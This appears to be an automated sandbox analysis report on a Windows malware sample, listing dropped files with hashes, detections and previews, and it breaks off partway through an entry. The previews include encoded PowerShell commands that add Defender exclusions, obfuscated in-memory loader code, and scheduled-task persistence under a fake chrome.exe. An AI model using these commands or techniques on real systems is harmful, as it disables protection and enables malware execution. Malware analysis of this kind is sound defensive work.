                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1292
                          Entropy (8bit):5.362943121948868
                          Encrypted:false
                          SSDEEP:24:3vUrcPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9b6F:8wPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                          MD5:12513EC7250BFC953C71EA941E82B42C
                          SHA1:F821E6EF80B3144841A0385A593C2605978BAD45
                          SHA-256:91249CB24DDFEB9DC31A3EACB04449E3422C6EB754265D23C897A413EFB62592
                          SHA-512:71B09E3B079329EB741B2ACF89C28870EB225EC51DA34CDB01BE31430272892E00F134B66F6FCF1F0D5AD5368FB20554F9C512794D84BE3015388A63195403E2
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...................................R............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bm0fgaxm.amy.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngejssxk.m2l.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy0x04mz.n4f.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm1ft0n0.g32.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u32chnre.idy.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vv5vdss4.ljn.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xll1yvfj.55e.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yezoz5fn.st5.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Roaming\34432.exe

                          Download File
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 35%, Browse
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=

                          C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe

                          Download File
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):5028144
                          Entropy (8bit):6.125106867276156
                          Encrypted:false
                          SSDEEP:98304:aqbWYKVEOkkj9NM8zWTl2ALz6dggqBu0teFFJyMEllE+VeJqUH:idzW0QuRabllA7
                          MD5:D55DC38B4EE6BED2168E74194533C572
                          SHA1:431F6F9AEB280102E8764A5184CABE6CC98052CA
                          SHA-256:4B283EC8E073FB61BBB612A152EB332A5C92E7473CF6584A8B716FD87684A936
                          SHA-512:C731304F2EC41AC9A49CA1727ED948299A40702D78A2B0BC9506E50AEAB97B5ADCF09D8958E48F8A0FFC9E2FF78941ED68DCAED2BAB06FEA847EB29EFAE58150
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 50%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<b..................B..@......;.........B...@..........................pL..............................................C.<....................pL.0I............................................C.@.............B.\............................text....?.......@.................. ..`.nQuHRq..o@..P...p@..D.............. ..`.rdata........B.......B.............@..@.data.........C.......C.............@....9SAT.........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\Chrome\chrome.exe

                          Download File
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.JE93yUZc.20220327014216.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.5305777622288925
                          Encrypted:false
                          SSDEEP:96:BZioj4N2c+qDo1Zo8FZikj4N2c+qDo1Zoe3x1xvxjZiij4N2c+qDo1ZooSx/x/xa:eSc57ec5Tgc5c6G
                          MD5:65537AD9317CD9A794FF2C8A25E3A7F8
                          SHA1:99CFC1994EEDC8F868B1245E655587DB41F269DF
                          SHA-256:5F7D9A86D2E3083645825298C5A61B2EB54DA2F2DA13241ECA4602C03766123F
                          SHA-512:99194B41134E7D8C016A22F4556267CE9C512AF7E886F10A2E2F3E4CF6478CF5DEB239A07E8CEE2EA383FCDD222C62680EA9163BBE25C576296390688BC78441
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014217..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.mru0uP4T.20220327014103.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.526751101211023
                          Encrypted:false
                          SSDEEP:96:BZisj4N2ctqDo1ZoQFZiFj4N2ctqDo1Zol3x1xvxjZirj4N2ctqDo1ZoHSx/x/xO:eGckvBckGzckpRD
                          MD5:3B10DF410A30476A570541A74E966B4E
                          SHA1:8834897CC7C20AD5C4C4B59A91B5535FB94B454A
                          SHA-256:4D3D10EC15EB5EB0E10AF8753F72EACE24DC29BA1D9B1638A7B1DD29C2EF8BC9
                          SHA-512:6D119BC9B7440EEFD9E2112530BAE3D038B6C698CFD12AAAB9FFA10EEDA1575BCE5BA56C395A930851F0498559C1CB576E871F14CBA37C79B716AB6C30A84A8A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 7048..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014103..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.nmfYJOoe.20220327014128.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5758
                          Entropy (8bit):5.5307589123834395
                          Encrypted:false
                          SSDEEP:96:BZiAj4N2AMvtqDo1ZojZiqj4N2AMvtqDo1ZoCgC4jZiqj4N2AMvtqDo1ZotBooSV:eqFk0IFkcIFk22y
                          MD5:7E8115E31EC613777C6FDFF8F88B6CF2
                          SHA1:253DBF54E6B578E26E71DC64D505DE9F62630062
                          SHA-256:4045DB0535FC2EF934E014E0C773D7E43CA50B077ED8536979F8CED459F1B608
                          SHA-512:5C6316219855F84FF2A3854F02035C1D55690AFA1286A93171565D10DBBDB1AC4F44E4A23CF4D7C455835CECBB7F8B749B98B31340C32B4CB26FFB23F87C82E7
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014129..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014129..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220327014354..Username: computer\user..Run

                          C:\Windows\System32\20220327\PowerShell_transcript.562258.muxVAL9A.20220327014144.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5943
                          Entropy (8bit):5.8320176220731055
                          Encrypted:false
                          SSDEEP:96:BZiuN4NNv4GZig3yXM84p32aw0lFrc0lmrn0lmTeowqDo1Zoav4GZig3yXM84p3j:envVnIKjVQr0QBavVnIKjVQr0QPu3
                          MD5:4D218FEB27E8E5EDB4F59D0922AA32A2
                          SHA1:DF06E9EDE255262EF358472D0C2A9B2FA306664D
                          SHA-256:5E36C2D39F94189CCAD4AEE28C26042A699ACEE5BB8E3C23ACA4C9BF9F16D853
                          SHA-512:FC7599509D4679CEA32839E147EA6A718DF3B58450ACC69B6B43135DFDAF0034EC5810C87918A8FB74C51F6613D8A44AE944B9AB12611BA992A5B27561D99C7A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014145..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$j

                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9432
                          Entropy (8bit):4.926811811017033
                          Encrypted:false
                          SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdJgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4L+kjh4iUxm44Qib4w
                          MD5:ADFF5BE0A9BB797ADEDC0B16C501A155
                          SHA1:ED842BE69739E3BF9082DE8FB0F7A596C22C0345
                          SHA-256:DADBB3611E60443C1F96672B3950A32B915D115EAA6FE8F6D8A57BED4067E3B0
                          SHA-512:9C6CA436FCE28572CD48D090C437881657F17B415A26F6C113A89755282D5D9BF46650B5C3C31FD890EC5C67CA0AB9A90A6F28B21B8315C25B506C6AC8EE600E
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1112
                          Entropy (8bit):5.248273118987016
                          Encrypted:false
                          SSDEEP:24:3lPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKyH+S:VPerB4nqRL/HvFe9t4Cv94nH+S
                          MD5:C89140BEA721DEBDA4F741B52939612A
                          SHA1:A353FE9D71C211A24EE7208F45CCC71170A65CD4
                          SHA-256:05E8082DAD4310F294CF069474C1DFA784427D69E87229D750FDA87C46B2D0B4
                          SHA-512:B134E10810FD68B0F50B143A08AFD88AA340CC54C561B09D559E23A77149AC31F26DFFC2FAAC5485247896CDB8535C0084EA2EDD815FB6E56F385F956D00DF27
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                          C:\Windows\Tasks\nslooksvc32.job

                          Download File
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5350
                          Entropy (8bit):3.907212050468804
                          Encrypted:false
                          SSDEEP:96:mgTVA1VwC9Hw1+Y3fmb2lpL+llpK3vbM+C4aWbga+vlLF5uOgA/wvpHJN/gAwIgA:3TVoVwC9HW/3+bq6hQM+CWbgaSLTu5A+
                          MD5:D6D553675A7B8F75130BDD8C7E3B7A7D
                          SHA1:EC8FE28936E9C0010B55180AD5A34439D1919EE3
                          SHA-256:523EAA769500D372D8DA8A2D77004F7F696865A174BB809B359792067822BE39
                          SHA-512:4DB377FD79B7B2218D824B04DF301209890D543C97A254A96AB28202890A23A7D68055EDF02592837377579ECD21F1055EC224F93B3C5CDF2D1295FD1B99A09F
                          Malicious:false
                          Reputation:unknown
                          Preview:......m....O.m....[F.......<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.o.B.Y.Z.x.p.o.B.u.J.D.g.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.h.C.P.A.J.C.D.c.A.n.F.q.J.q.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.N.i.b.V.x.W.x.T.F.c.).$.q.K.H.X.R.L.j.x.c.Q.b.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.

                          C:\Windows\Tasks\nslooksvc64.job

                          Download File
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5250
                          Entropy (8bit):3.8780212618682253
                          Encrypted:false
                          SSDEEP:96:hgTVwJV49Hw1+Y3Xb+pXpK9M+C4aWOtBmD9Z+vl9EF5oY5gAeNvpHYNiagABQnor:2TVwJV49HW/3XbGZ+M+CW6gDzSeToYu6
                          MD5:8743521E80CA300CB5D64D9129AC9B32
                          SHA1:02EC0C200E3CE2F12CA6EFAC516CFC0E72DA5AA2
                          SHA-256:B71335A7AF988047E29D0BDCE479EE8DD32351F03DE0A73D53D7D5C68E82A1F9
